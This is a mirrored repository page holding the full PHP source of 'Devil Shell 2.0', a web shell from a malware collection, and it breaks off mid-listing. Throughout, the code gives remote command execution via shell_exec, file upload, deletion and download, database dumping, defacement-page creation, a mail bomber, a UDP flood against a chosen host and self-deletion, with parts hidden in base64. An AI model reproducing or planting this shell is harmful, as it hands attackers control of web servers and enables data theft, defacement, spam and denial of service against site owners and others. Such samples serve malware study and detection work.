Mirrors/webshell
2
0
Fork 0
mirror of https://github.com/tennc/webshell synced 2025-02-18 10:48:23 +00:00
Code Issues Projects Releases Packages Wiki Activity
webshell/web-malware-collection-13-06-2012/PHP/ugdevil.v2.0.txt

880 lines
31 KiB
Text
Raw Normal View History

web-malware-collection
2013-06-05 12:08:30 +08:00
<?php
//========================================//
//========+++DEVIL SHELL 2.0v+++==========//
//========================================//
//====+++CODED BY UNDERGROUNDE DEVIL+++===//
//========================================//
//=====+++TEAM NUTS|| teamnuts.in+++=====//
//========================================//
//====+++EMAIL ID UGDEVIL@GMAIL.COM+++====//
//========================================//
session_start();
ob_start();
error_reporting(0);
@set_time_limit(0);
@ini_set('max_execution_time',0);
@ini_set('output_buffering',0);
?>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8"/>
<title>υη∂єяgяσυη∂ ∂єνιℓ: αη ιη∂ιαη нα¢кєя</title>
<head><script type=text/javascript>
function only_num(x)
{
y=x.replace(/[^\d]{1,100}/,'' );
return y;
}
</script></head>
<body text=#336666 bgcolor="#0000000" style="font-family: Courier New, Courier, monospace;
font-size: 14px;" oncontextmenu="return false;">
<?php
$pstr="Q3JlZGl0IDogVW5kZXJncm91bmQgRGV2aWwgJm5ic3A7ICB8DQo8YSBocmVmPSJodHRwOi8vdGVhbW51dHMuaW4iPlRlYW0gTnV0czwvYT4NCnwgJm5ic3A7IEVtYWlsOiB1Z2RldmlsQGdtYWlsLmNvbQ==";
$pv=@phpversion();
$self=$_SERVER["PHP_SELF"];
$sm = @ini_get('safe_mode');
if(isset($_GET['open']))
{
chdir($_GET['open']);
$_SESSION['dir']=$_GET['open'];
}
else if(isset($_GET['create']))
{
chdir($_GET['create']);
$_SESSION['dir']=$_GET['create'];
}
if(isset($_POST['dsub']))
{
header('location:'.$self."?open=".$_POST['ndir']);
}
function validate_email($e1,$e2,$n)
{
if( (filter_var($e1,FILTER_VALIDATE_EMAIL)) && (filter_var($e2,FILTER_VALIDATE_EMAIL)) )
{
if(is_numeric($n))
{
$error="";
return $error;
}
else
{
$error="Enter valid number of messages";
}
}
else
{
$error="Enter Valid Email Id";}
return $error;
}
function devil_download($path)
{
header('Content-Description: File Transfer');
header('Content-Type: application/octet-stream');
header('Content-Disposition: attachment; filename='.basename($path));
header('Content-Transfer-Encoding: binary');
header('Expires: 0');
header('Cache-Control: must-revalidate, post-check=0, pre-check=0');
header('Pragma: public');
header('Content-Length: ' . filesize($path));
ob_clean();
flush();
readfile($path);
exit;
}
function sept()
{
$sepr=explode('?',$self);
echo $sepr[0];
}
if(isset($_SESSION['a'])&& !isset($_GET['edit']))
{
function dis()
{
if(!ini_get('disable_functions'))
{
echo "None";
}
else
{
echo @ini_get('disable_functions');
}
}
function logout()
{
session_destroy();
header('location:'.$self);
}
function yip()
{
echo $_SERVER["REMOTE_ADDR"];
}
function odi()
{
$od = @ini_get("open_basedir");
echo $od;
}
function sip()
{
echo getenv('SERVER_ADDR');
}
function cip()
{
echo $_SERVER["SERVER_NAME"];
}
function safe()
{
echo($sm?"YES":"NO");
}
function browse()
{
$brow= $_SERVER["HTTP_USER_AGENT"];
print($brow);
}
function db_run($server,$user,$pass,$db,$query)
{
mysql_connect($server,$user,$pass) or die('enable to connect server');
mysql_select_db($db) or die('enable to connect DB');
$q1=mysql_query($query) or die('QUERY ERROR');
$exp=explode($query," ");
if($exp[0]=='SELECT')
{
while($p=mysql_fetch_array($q1))
{
echo "";
}
}
echo "Query Run Successfulyy...";
}
function split_dir()
{
$de=explode("/",getcwd());
$del=$de[0];
for($count=0;$count<sizeof($de);$count++)
{
$imp=$imp.$de[$count].'/';
echo "<a href=".$self."?open=".$imp.">".$de[$count]."</a> / ";
}
}
function search_file($new)
{
$de=explode("\\",getcwd());
$del=$de[0];echo "Finding Files.....<br><br>";
for($count=0;$count<sizeof($de);$count++)
{
$imp=$imp.$de[$count].'/';
chdir($imp);
if($handle = opendir('./'))
{
while (false !== ($file = readdir($handle)))
{
if($file==$new)
{
echo "<br>$file-<a href=".$self."?edit=".$imp."$file>Edit</a><br>";
}
}
}
}
echo "<br><br>";
}
function devil_dump($host,$user,$pass,$name,$tables = '*')
{
$link = mysql_connect($host,$user,$pass);
mysql_select_db($name,$link);
//get all of the tables
if($tables == '*')
{
$tables = array();
$result = mysql_query('SHOW TABLES');
while($row = mysql_fetch_row($result))
{
$tables[] = $row[0];
}
}
else
{
$tables = is_array($tables) ? $tables : explode(',',$tables);
}
foreach($tables as $table)
{
$result = mysql_query('SELECT * FROM '.$table);
$num_fields = mysql_num_fields($result);
$return.= 'DROP TABLE '.$table.';';
$row2 = mysql_fetch_row(mysql_query('SHOW CREATE TABLE '.$table));
$return.= "\n\n".$row2[1].";\n\n";
for ($i = 0; $i < $num_fields; $i++)
{
while($row = mysql_fetch_row($result))
{
$return.= 'INSERT INTO '.$table.' VALUES(';
for($j=0; $j<$num_fields; $j++)
{
$row[$j] = addslashes($row[$j]);
$row[$j] = ereg_replace("\n","\\n",$row[$j]);
if (isset($row[$j])) { $return.= '"'.$row[$j].'"' ; } else { $return.= '""'; }
if ($j<($num_fields-1)) { $return.= ','; }
}
$return.= ");\n";
}
}
$return.="\n\n\n";
}
//save file
$tname=date("mys");
$tempdb="db_".$tname.".sql";
$open = fopen($tempdb,'w+');
fwrite($open,$return);
devil_download($tempdb);
}
function mysql_ver()
{
$output = shell_exec('mysql -V');
preg_match('@[0-9]+\.[0-9]+\.[0-9]+@', $output, $ver);
return $ver[0];
}
if(isset($_GET['delete']))
{
unlink($_GET['delete']);
$redir=$_GET['delete'];
rmdir($_GET['delete']);
header('location:'.$self.'?open='.$_SESSION['dir']);
}
function disk($this)
{
if($this=='2')
$ds=disk_free_space(".");
else
$ds=disk_total_space(".");
if($ds>=1073741824)
{
$ds=number_format(($ds/1073741824),2)." gb";
}
else if($ds>=1048576)
{
$ds=number_format(($ds/1048576),2)." mb";
}
else if($size >= 1024)
{
$ds=number_format(($ds/1024),2)." kb";
}
else
{
$ds=$ds." byte";
}
return $ds;
}
if($_GET['u']=='logout')
{
logout();
header('location:'.$self);
}
else if(isset($_POST['u']))
{
move_uploaded_file($_FILES['a']['tmp_name'],$_SESSION['dir']."/".$_FILES['a']['name']);
move_uploaded_file($_FILES['b']['tmp_name'],$_SESSION['dir']."/".$_FILES['b']['name']);
move_uploaded_file($_FILES['c']['tmp_name'],$_SESSION['dir']."/".$_FILES['c']['name']);
header('location:'.$self."?open=".$_SESSION['dir']);
}
$str="PHN0eWxlIHR5cGU9InRleHQvY3NzIj4NCjwhLS0NCi5zdHlsZTEge2NvbG9yOiAjRkZGRkZGfQ0KDQouc3R5bGUyIHsNCgljb2xvcjogI0ZGRkZGRjsNCglmb250LXNpemU6IDM2cHg7DQoJZm9udC13ZWlnaHQ6IGJvbGQ7DQp9DQouc3R5bGUzIHsNCglmb250LXNpemU6IDM2Ow0KCWZvbnQtd2VpZ2h0OiBib2xkOw0KfQ0KLS0+DQo8L3N0eWxlPg0KPHAgY2xhc3M9InN0eWxlMiI+ICA8dT5EZXZpbCBWMi4wIFBIUCBTaGVsbDwvdT4gIDwvcD4NCjxwPiA8YnI+DQogIERldmlsIFYxLjMgUEhQIFNoZWxsIGlzIGEgUEhQIFNjcmlwdCwgd2hpY2ggaXMgaGFyZGx5IGRldGVjdGFibGUgYXMgIG1hbGljaW91cyBjb2RlIGNyZWF0ZWQgZm9yIGNoZWNraW5nIHRoZSB2dWxuZXJhYmlsaXR5IGFuZCBzZWN1cml0eSAgY2hlY2sgb2YgYW55IHdlYiBzZXJ2ZXIgb3Igd2Vic2l0ZS4gWW91IGNhbiBjaGVjayB5b3VyIFdlYnNpdGUgYW5kICA/cmVtb3RlIHdlYiBzZXJ2ZXIgU2VjdXJpdHkuIFRoaXMgc2hlbGwgcHJvdmlkZSB5b3UgbW92ZSBpbiBzZXJ2ZXIgIGRpcmVjdG9yeSAsdmlld2luZyBmaWxlcyBwcmVzZW50IGluIGRpcmVjdG9yeSAseW91IGNhbj8gZGVsZXRlICxlZGl0ICBhbmQgdXBsb2FkIHByb2ZpbGVzLiBNb3JlIG92ZXIgeW91IGNhbiBjaGVjayA6IDxzcGFuIGNsYXNzPSJzdHlsZTEiPjxzdHJvbmc+U2VydmVyIElQICxZb3VyIElQLCBIb3N0ZWQgUEhQIFZlcnNpb24gLCBTZXJ2ZXIgUG9ydCwgU2FmZSBtb2RlIDogWWVzL05vLCBEaXNrIFNwYWNlLCBmcmVlIFNwYWNlLE1haWwgQm9tYmluZzwvc3Ryb25nPiA8c3Ryb25nPkREb1MgQXR0YWNrLE1haWwgQm9tYmluZyxDcmVhdGUgRmlsZSBhbmQgRm9sZGVyPC9zdHJvbmc+PC9zcGFuPjxzdHJvbmc+IGV0Yzwvc3Ryb25nPiA8L3A+DQo8cD48c3Ryb25nPjx1PkF0dHJhY3RpdmUgZmVhdHVyZSB3aGljaCBtYWtlIGRpZmZlcmVudCB3aXRoIG90aGVyIHNoZWxsPC91Pjwvc3Ryb25nPjwvcD4NCjx1bD4NCiAgPGxpPlVuZGV0ZWN0YWJsZSBieSBHb29nbGUgRG9yazwvbGk+DQogIDxsaT5CYWNrLUNvbm5lY3QgW0F2YWlsYWJsZSBpbiBQYWlkIFZlcnNpb25dPC9saT4NCiAgPGxpPkRhdGFiYXNlIER1bXAgW0F1dG9tYXRpYyBEdW1wIGF2YWlsYWJsZSBpbiBQYWlkIFZlcnNpb25dPC9saT4NCiAgPGxpPlNRTCBhbmQgTGludXggQ29tbWFuZCBSdW48L2xpPg0KICA8bGk+RnJvbnQvRGVmYWNlIFBhZ2UgQ3JlYXRvcjwvbGk+DQogIDxsaT5NYWlsIEJvbWJlciBUZXN0aW5nPC9saT4NCiAgPGxpPkREb1MgYXR0YWNrZXIgVGVzdGluZzwvbGk+DQogIDxsaT5TZWxmIGtpbGw8L2xpPg0KICA8bGk+SW5kaXZpdXNhbCBMb2dpbidzPC9saT4NCjwvdWw+DQo8cD4gPHU+PHN0cm9uZz5MaW1pdGF0aW9uczwvc3Ryb25nPiA8L3U+PGJyPg0KICBNb3N0bHkgRnVuY3Rpb24gYXJlIHdvcmtpbmcgb24gbGludXggc2VydmVycy4gPC9wPg0KPHA+IDxzdHJvbmc+PHU+QWJvdXQgQ29kZXI8L3U+PC9zdHJvbmc+IDogPGJyPg0KICBTY3JpcHQgaXMgY3JlYXRlZCBieSBVbmRlcmdyb3VuZCBEZXZpbCBhbiBJbmRpYW4gRXRoaWNhbCBoYWNrZXIuSSBsaWtlIHRvIHRoYW5rZnVsIHRvIG15IG1hdGVzIDxzcGFuIGNsYXNzPSJzdHlsZTEiPkFuZWVzaCxSYWh1bCBhbmQgTWF5YW5rPC9zcGFuPiB3aG8gaW5zcGlyZSBhbmQgaGVscGVkIG1lIHRvIGRldmVsb3AgdGhpcyBjb2RlLiA8L3A+DQo8cD4gWW91IGNhbiBkb3dubG9hZD8gdGhpcyBzY3JpcHQgZnJvbSA8c3Ryb25nPjxhIGhyZWY9Imh0dHA6Ly93d3cudGVhbW51dHMuaW4iPnd3dy50ZWFtbnV0cy5pbjwvYT48L3N0cm9uZz4gPyAudGhpcyBpcyByZWxlYXNlIHVuZGVyIDxzcGFuIGNsYXNzPSJzdHlsZTEiPjxzdHJvbmc+R05VIEdFTkVSQUwgUFVCTElDIExJQ0VOU0U8L3N0cm9uZz48L3NwYW4+IDwvcD4NCjxwPiA8c3Ryb25nPjx1PkRlY2xhcmF0aW9uOjwvdT4gPC9zdHJvbmc+IDxicj4NCiAgVGhpcyBzY3JpcHQgb25seSBmb3IgZWR1Y2F0aW9uIHB1cnBvc2Ugb3IgdGVzdGluZyB5b3VyIG93biBzZXJ2ZXIuRG9uJ3QgbWlzcyB1c2UgaXQgb3RoZXJ3aXNlICB0aGUgc2NyaXB0IG1ha2VyIGlzIG5vdCByZXNwb25zaWJlIGZvciBhbnkgY2FzdWFsaXR5IG9yIGRhbWFnZS4gPC9wPg0KPHA+IDxzdHJvbmc+PHU+SW5zdGFsbGF0aW9uOjwvdT48L3N0cm9uZz4gPGJyPg0KICBTaW1wbGUgaW5zdGFsbGF0aW9uIGp1c3QgcGVuZXRyYXRlIHRoZSBmaWxlIHVzaW5nIEZUUCBvciBodG1sIFVwbG9hZGVyIG9uIHNlcnZlciBhbmQgY2hlY2sgdGhlIHNpdGUgdnVsbmVyYWJpbGl0eS4gPC9wPg0KPHA+IFRoaXMgaXMgcGFzc3dvcmQgcHJvdGVjdGVkIHNoZWxsIHNvIHlvdSBjYW4gc2VuZCBlbWFpbCB0byBnZXQgdXNlcm5hbWUgb3IgcGFzc3dvcmQgPGJyPg0KICBhdCA8c3BhbiBjbGFzcz0ic3R5bGUxIj51Z2RldmlsQGdtYWlsLmNvbTwvc3Bhbj4gPC9wPg0KPHA+IDxzdHJvbmc+PHU+U3VnZ2VzdGlvbi9CdWcvUmVwb3J0OjwvdT48L3N0cm9uZz4gPGJyPg0KICBPdXIgdGVhbSBkbyB0aGUgaGFyZHdvcmsgZm9yIG1ha2luZyB0aGlzLGFmdGVydGhhdCBpZiB5b3UgZmluZCBhbnkgYnVncywgZG9uJ3QgaGVzaXRhdGUgdG8gaW5mb3JtIG1lIGF0IHVnZGV2aWxAZ21haWwuY29tIDwvcD4NCjxwPiBEb3dubG9hZCA8YnI+DQogIFlvdSBjYW4gZG93bmxvYWQgc2hlbGwgZnJvbSA8c3Ryb25nPjxhIGhyZWY9Imh0dHA6Ly93d3cudGVhbW51dHMuaW4iPnd3dy50ZWFtbnV0cy5pbjwvYT48L3N0cm9uZz4gYW5kIGFsc28gdmlzaXQgPHN0cm9uZz48YSBocmVmPSJodHRwOi8vd3d3LnRlYW1udXRzLmluIj53d3cudGVhbW51dHMuaW48L2E+PC9zdHJvbmc+ICAgZm9yIGxhdGVzdCB2ZXJzaW9uLm9yIHlvdSBjYW4gbWFpbCBtZSBmb3IgdGhpcyBzY3JpcHQgYXQgIHVnZGV2aWxAZ21haWwuY29tIDwvcD4NCg==";
?>
<table width=100%>
<tr><td bgcolor="#000000"><table>
<tr height=20><td width=100 bgcolor=orange></td><td rowspan=3 width=700><font color=#33CCCC face="Monotype Corsiva" size=7><?php echo base64_decode("RGV2aWwgU2hlbGw="); ?></font> <font color=#FFffff><?php echo base64_decode('VjIuMA=='); ?></font></td><td rowspan=3><?php echo base64_decode('PGltZyBzcmM9aHR0cDovL2kxMTc5LnBob3RvYnVja2V0LmNvbS9hbGJ1bXMveDM5MC9wYXVsbW9uY3kvdGVhbW51dHMvbG9nby5wbmcgYWx0PSJVbmRlcmdyb3VuZCBEZXZpbCIgaGVpZ2h0PTcwPg=='); ?></td></tr>
<tr width=100 height=20 bgcolor=white><th><font color=blue><?php echo base64_decode("SU5ESUE="); ?></font></th></tr>
<tr width=100 height=20 bgcolor=green><td></td></tr>
</table>
</td>
</tr>
<tr><td bgcolor="#000000"> <hr class=li><a href=<?php echo $self."?open="; ?>>Shell</a> | <a href=<?php echo $self."?create=".$_SESSION['dir']?>>Create File</a> |
<a href=<?php echo $self."?bc"; ?>><font color=#FF6633 size=2>Back Connect</font></a> |
<a href=<?php echo $self."?run"; ?>>Run Command[<font color=#FF6633 size=2>NEW</font>]</a> |
<a href=<?php echo $self."?mail"; ?>>Mail Bomber</a> |
<a href=<?php echo $self."?dos"; ?>>DOS ATTACK</a> |
<a href=<?php echo $self;?>?warning>Declaration</a> |
<br><a href=<?php echo $self;?>?cdp>Create Deface Page</a> |
<a href=<?php echo $self;?>?sf>Search File[<font color=#FF6633 size=2>NEW</font>]</a> |
<a href=<?php echo $self;?>?dd>Database Dump[<font color=#FF6633 size=2>NEW</font>]</a> |
<a href=<?php echo $self."?moreinfo"; ?>>More Information</a> |
<a href=<?php echo $self."?phpinfo"; ?>>PHP Info</a> | <br>
<a href=http://www.teamnuts.in target=_blank>Shell Tutorial</a> |
<a href=<?php echo $self;?>?self>Self Kill</a> |
<a href=<?php echo $self;?>?u=logout>Logout</a></td>
</tr>
<tr><td bgcolor="#000000"> <hr class=li><span class=hd>Server IP :</span><span class=head> <?php cip(); ?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>Your IP : </span><span class=head> <?php yip(); ?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>PHP Version : </span> <span class=head><?php echo $pv; ?></span>
&nbsp;&nbsp;<span class=hd>Server Port :</span> <span class=head><?php echo $_SERVER['SERVER_PORT'];?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>Safe Mode :</span> <span class=head><?php safe();?></span>
&nbsp;&nbsp;&nbsp;&nbsp;<span class=hd>Disk Space :</span> <span class=head><?php echo disk(1);?></span><br>
<br><span class=hd>free Space :</span> <span class=head><?php echo disk(2);?></span>
<span class=hd>Your System info :</span> <span class=head><?php echo php_uname(); ?></span>
<br><br>
<span class=hd>Directory : </span> <span class=head><?php echo split_dir();?></span> <span class=hd>View Other Directories</span> <span class=head>[<a href=<?php echo $self;?>?open=c:/>C:</a>]</span> | <span class=head>[<a href=<?php echo $self;?>?open=D:/>D:</a>]</span>
| <span class=head>[<a href=<?php echo $self;?>?open=E:/>E:</a>]</span>
<hr class=li>
</td></tr>
<tr><td bgcolor="#000000">
<table width=100% class=tab>
<?php
if(isset($_GET['create']))
{
if(isset($_SESSION['a']))
{
echo "<form action=$self?edit=".$_SESSION['a']." method=post>";
}
else
{
echo "<form action=$self?edit= method=post>";
}
?>
<center>
<table>
<tr><td><span class=head>File Name </span> </td><td><input type=text name=fn size=70></td></tr>
<tr><td colspan=2><span class=head>File content</td></tr>
<tr><th colspan=2><center><textarea rows=15 cols=70 name=fc></textarea></th></tr>
<tr><th colspan=2><input type=submit value="Create File">
</th></tr></table>
</form>
<?php
}
else if(isset($_GET['cdp']))
{
?> <form action=# method=post>
<table>
<tr><td>Save At : </td><td><input type=text name=sa value=<?php echo realpath(''); ?>></td></tr>
<tr><td>FILE NAME : </td><td><input type=text name=fn></td></tr>
<tr><td>FILE Title: </td><td><input type=text name=ft size=50></td></tr>
<tr><td>BACKGROUND COLOR : </td><td><input type=text value=#000000 name=bc></td></tr>
<tr><td>Main Picture : </td><td><input type=text name=pic> WIDTH <input type=text name=w size=10 value=400>HEIGHT <input type=text name=h value=300></td></tr>
<tr><td>First Head Line : </td><td><input type=text name=fh size=50> COLOR <input type=text name=col1 value=#FF0033></td></tr>
<tr><td>Material : </td><td><textarea name=mat rows=10 cols=50></textarea> COLOR <input type=text name=col2 value=#fffff><br>Center Material BG COLOR <input type=text name=col4 value=#fff></td></tr>
<tr><td>Footer Note : </td><td><input type=text name=foot> COLOR <input type=text name=col3 value=#ff0033></td></tr>
<tr><th colspan=2><input type=submit value="CREATE DEFACE PAGE"></th></tr>
</table>
</form>
<?php
$filn=$_POST['fn'];
$sa=$_POST['sa'];
$bc=$_POST['bc'];
$pic=$_POST['pic'];
$fh=$_POST['fh'];
$ft=$_POST['ft'];
$mat=nl2br($_POST['mat']);
$foot=$_POST['foot'];
$w=$_POST['w'];
$h=$_POST['h'];
$c1=$_POST['col1'];
$c2=$_POST['col2'];
$c3=$_POST['col3'];
$c4=$_POST['col4'];
echo $filn;
if(!empty($filn))
{
$fil=fopen($sa."/".$filn,'w');
fwrite($fil,"<html><title>".$ft."</title><body bgcolor=".$bc." text=#ffff><br><br><center><img src=".$pic." width=".$w." height=".$h."><br><h2><font color=".$c1.">".$fh."</font></h2>
<table width=700 height=50 bgcolor=".$c4." style='border:double; border-color:#FF0033;'> <tr><td><p><font color=".$c2.">".$mat."</font></p>
</td></tr></table>
<br><br><p><font color=".$c3.">".$foot."</font></p>
");
header('location:'.$self."?done=".$filn);
}
}
else if(isset($_GET['sf']))
{
echo "<br><br><form action=# method=post>Search File : <input type=text name=s_f><input type=submit value='Search File'> </form><br><br>";
if(!empty($_POST['s_f']))
search_file($_POST['s_f']);
}
else if(isset($_GET['done']))
{
echo "<br><br>".$_GET['done']." PAGE CREATE Successfully Move To Shell Home Page <a href=".$self.">Click HERE</a>";
}
else if(isset($_GET['warning']))
{
echo base64_decode($str);
}
else if(isset($_GET['phpinfo']))
{
echo "<center>".phpinfo();
}
else if(isset($_GET['self']))
{
unlink(__FILE__);
}
else if(isset($_GET['dd']))
{
?>
<center>Mannually</center>
<hr width=100 class=li>
<form action=# method=post>
<table cellspacing=10>
<tr><td width=200>Server Name</td><td width=200><input type=text name=s1></td><td rowspan=4 width=300><?php echo base64_decode('PGZvbnQgY29sb3I9I2ZmZmZmZj5OT1RFOiBBdXRvbWF0aWMgZGF0YWJhc2UgZmV0Y2ggZmVhdHVyZSBhbHNvIGF2YWlsYWJsZSBpbiBwYWlkIHZlcnNpb24='); ?></td></tr>
<tr><td>Server Username</td><td><input type=text name=s2></td></tr>
<tr><td>Server Password</td><td><input type=text name=s3></td></tr>
<tr><td>Database Name</td><td><input type=text name=s4></td></tr>
<tr><td colspan=2><input type=submit Value='Take Dump'></td></tr>
</table>
</form>
<hr class=li>
<?php
if(!empty($_POST['s1']))
{
echo "<script language=javascript>
alert('hello');
</script>";
devil_dump('localhost','root','','cms');
}
}
else if(isset($_GET['run']))
{
echo "<br><br><table><tr><td><table class=tab><tr><td><form action=# method=post>
Run Linux command : <input type=text name=rc> <input type=submit value='Run Command'></form></td></tr></table>";
echo "<br><br><form action=# method=post>
<table cellspacing=5 class=tab>
<tr><td width=200>Server Name</td><td width=200><input type=text name=s1></td></tr>
<tr><td>Server Username</td><td><input type=text name=s2></td></tr>
<tr><td>Server Password</td><td><input type=text name=s3></td></tr>
<tr><td>Database Name</td><td><input type=text name=s4></td></tr>
<tr><td>Command</td><td><textarea rows=2 cols=50 name=s5></textarea></td></tr>
<tr><td colspan=2><input type=submit Value='Run Command'></td></tr>
</table>
</form></td><td><h2>Result</h2><textarea rows=14 cols=60 class=tab>
";
if(!empty($_POST['rc']))
{
echo shell_exec($_POST['rc']);
}
else if(!empty($_POST['s1']))
{
echo $_POST['s5']."\r\n";
db_run($_POST['s1'],$_POST['s2'],$_POST['s3'],$_POST['s4'],$_POST['s5']);
}
echo "</textarea></td></tr>
<tr><td rowspan=3>".base64_decode('PGZvbnQgY29sb3I9I2ZmZmZmZj5OT1RFOiBBdXRvbWF0aWMgZGF0YWJhc2UgZmV0Y2ggZmVhdHVyZSBhbHNvIGF2YWlsYWJsZSBpbiBwYWlkIHZlcnNpb24=')."</td></tr>
</table>";
}
else if(isset($_GET['moreinfo']))
{
?>
<center>
<table width=90%>
<tr><th colspan=2 width=200> Brief Information </th></tr>
<tr><td class=head><b>Server Admin : </td><td><?php echo $_SERVER['SERVER_ADMIN']; ?></td></tr>
<tr><td class=head><b>Server Name : </td><td><?php cip(); ?></td></tr>
<tr><td class=head><b>Server IP : </td><td> <?php cip(); ?> </td></tr>
<tr><td class=head><b>Server PORT : </td><td><?php echo $_SERVER['SERVER_PORT'];?></td></tr>
<tr><td class=head><b>Safe Mode : </td><td><?php echo @ini_get("safe_mode")?("<b>Enable(<font color=red>Secure</font>)"):("Disable(<font color=white>Insecure</font>)"); ?></td></tr>
<tr><td class=head><b>Base Directory : </td><td><?php echo @ini_get("open_basedir")?("<b>Enable(<font color=red>Secure</font>)"):("Disable(<font color=white>Insecure</font>)"); ?></td></tr>
<tr><td class=head><b>Your IP : </td><td><?php yip(); ?></td></tr>
<tr><td class=head><b>PHP VERSION : </td><td><?php echo $pv; ?></td></tr>
<tr><td class=head><b>Curl</td><td><?php echo function_exists('curl_version')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>Oracle : </td><td><?php echo function_exists('ocilogon')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>MySQL : </td><td><?php echo function_exists('mysql_connect')?("<b>Enable"):("Disable");?></td></tr>
<tr><td class=head><b>MSSQL :</td><td><?php echo function_exists('mssql_connect')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>PostgreSQL :</td><td><?php echo function_exists('pg_connect')?("<b>Enable"):("Disable"); ?></td></tr>
<tr><td class=head><b>Disable functions :</td><td><?php dis(); ?></td></tr>
<tr><td class=head><b>Total Disk Space : </td><td><?php echo disk(1);?></td></tr>
<tr><td class=head><b>Free Space : </td><td><?php echo disk(2);?></td></tr>
<tr><td class=head><b>OS</td><td><?php echo php_uname(); ?></td></tr>
<tr><td class=head><b>Server Software : </td><td><?php echo $_SERVER['SERVER_SOFTWARE']; ?></td></tr>
</table>
<?php
}
else if(isset($_GET['bc']))
{
echo base64_decode('PGNlbnRlcj48YnI+PGJyPjxicj48YnI+PGZvbnQgY29sb3I9I2ZmZmZmZmY+QXZhaWxibGUgb24gUGFpZCBWZXJzaW9uIGNvbnRhY3QgVW5kZXJncm91bmQgRGV2aWwgdG8gcHVyY2hhc2UgYXQgdWdkZXZpbEBnbWFpbC5jb208L2ZvbnQ+PGJyPjxicj48L2NlbnRlcj48YnI+PGJyPjxicj4=');
}
else if(isset($_GET['download']))
{
$size = filesize($_GET['download']);
$r=explode('//',$_GET['download']);
for($i=0;$i<sizeof($r);$i++)
{
$fd=$r[$i];
}
devil_download($fd);
}
else if(isset($_GET['mail']))
{
if(isset($_POST['send_email']))
{
$_POST['num']=stripslashes($_POST['num']);
$_POST['sen'] = stripslashes($_POST['sen']);
$_POST['rec'] = stripslashes($_POST['rec']);
$_POST['sub'] = stripslashes($_POST['sub']);
$_POST['msg'] = stripslashes($_POST['msg']);
$sen=$_POST['sen'];
$rec=$_POST['rec'];
$num=$_POST['num'];
$sub=$_POST['sub'];
$msg=$_POST['msg'];
if(($sen!="")&&($rec!="")&&($num!="")&&($sub!="")&&($msg!=""))
{
$error=validate_email($sen,$rec,$num);
if($error=="")
{
$headers = "MIME-Version: 1.0\r\n";
$headers .= "Content-type: text/plain"."; charset=windows-1251\r\n";
$headers .= "From: ".$sen;
for($i=0;$i<$num;$i++)
{
mail($rec,$sub,$msg,$headers) or die('<b>Message Sending Failed</b>');
}
}
}
else
{
$error="Fill all the fields";
}
}
$zzz=<<<zzx
<form action= $self?mail= method="post">
<table>
<tr><td><b>Sender's Email</b></td><td><input type=text name=sen size=50 value=$sen></td></tr>
<tr><td><b>Receipent's Email</b></td><td><input type=text name=rec size=50 value=$rec ></td></tr>
<tr><td><b>Number</b></td><td><input type=text size=50 name=num onkeyup="this.value=only_num(this.value)" maxlength=7 value=$num></td></tr>
<tr><td><b>Subject</b></td><td><input type=text size=50 name=sub value=$sub></td></tr>
<tr><td><b>Message</b></td><td><textarea name=msg rows=10 cols=80 >$msg</textarea></td></tr>
<tr><td></td><td><input type=submit name=send_email value=send ></td></tr><br/>
<tr><td colspan="2"><p style=" font-size:25px"><b>$error</b></p></td></tr>
</table>
</form>
zzx;
echo $zzz;
}
else if(isset($_GET['rename']))
{
echo "<form action=# method=post>New File name <input type=text name=rf><br><input type=submit value='Rename File' name=srf></form>";
if(isset($_POST['srf']))
{
rename($_GET['rename'],$_POST['rf']);
header('location:'.$self."?open=".$_SESSION['dir']);
}
}
else if(isset($_GET['dos']))
{
if(!isset($_POST['dsub']))
{
echo "<center><form action=# method=post><table><tr><td colspan=2><h2>DOS ATACK</h2> <tr><td>Target Server IP : </td><td><input type=text name=ddos value=".$_SERVER["SERVER_NAME"]."></td></tr>
<tr><td>Server Port : </td><td><input type=text name=dpos value=".$_SERVER['SERVER_PORT']."></td></tr>
<tr><td>Time Execution : </td><td><input type=text name=dtim></td></tr>
<tr><th colspan=2><input type=Submit name=dsub value='attack--->'></th></tr>
<tr><td colspan=2 height=100></td></tr>
</form></table>";
}
else
{
$sip=$_POST['ddos'];
$port=$_POST['dpos'];
$t=time()+$_POST['dtim'];
$send = 0;
print "DOS Atack on $ip using ".$port."PORT <br><br>";
for($i=0;$i<99999;$i++)
{
$get .= "FLOOD";
}
do
{
$send++;
}
while(time() > $max_time);
$fo = fsockopen("udp://$sip", $port, $errno, $errstr, 5);
if($fo)
{
fwrite($fo, $get);
fclose($fo);
}
echo "DOS completed @ ".date("h:i:s A")."<br> Total Data Send [" . number_format(($send*65)/1024, 0) . " MB]<br> Average Data per second [". number_format($send/$_POST['dtim'], 0) . "]";
}
}
else if($handle = opendir('./'))
{
while (false !== ($file = readdir($handle)))
{
if(is_dir($file))
{
$directories[] = $file;
}
else
{
$files[] = $file;
}
}
asort($directories);
asort($files);
$kb=filesize($file)/1024;
foreach($directories as $file)
{ if($bg%2==0)
echo "<tr bgcolor=#353535>";
else
echo "<tr bgcolor=#242424>";
$kb=number_format(filesize($file)/1024,2);
echo "
<td valign=top><a href=".$self."?open=".realpath('.')."/".$file."><span class=li>".$file."</span> </a></td><td class=li> &nbsp;&nbsp;&nbsp;&nbsp;...<td valign=top class=li width=200>".date ("m/d/Y | H:i:s", filemtime($file))."</td>
<th width=100><font color=white>".substr(sprintf('%o', fileperms(realpath(''))), -3)."</td>
<td><a href=".$self."?open=".realpath('.')."/".$file."><span class=li>Open</span></a> | <a href=".$self."?delete=".realpath('.')."/".$file."><span class=li>Delete</span></a>
</td>";
$bg++;
}
foreach($files as $file)
{
if($bg%2==0)
echo "<tr bgcolor=#353535>";
else
echo "<tr bgcolor=#242424>";
$kb=number_format(filesize($file)/1024,2);
echo "
<td valign=top><a href=".$self."?edit=".realpath('')."><span class=li>".$file."</span> </a></td><td class=li> &nbsp;&nbsp;&nbsp;&nbsp;".$kb."kb<td valign=top class=li>".date ("m/d/Y | H:i:s", filemtime($file))."</th>
<th><font color=white>".substr(sprintf('%o', fileperms(realpath(''))), -3)."</td>
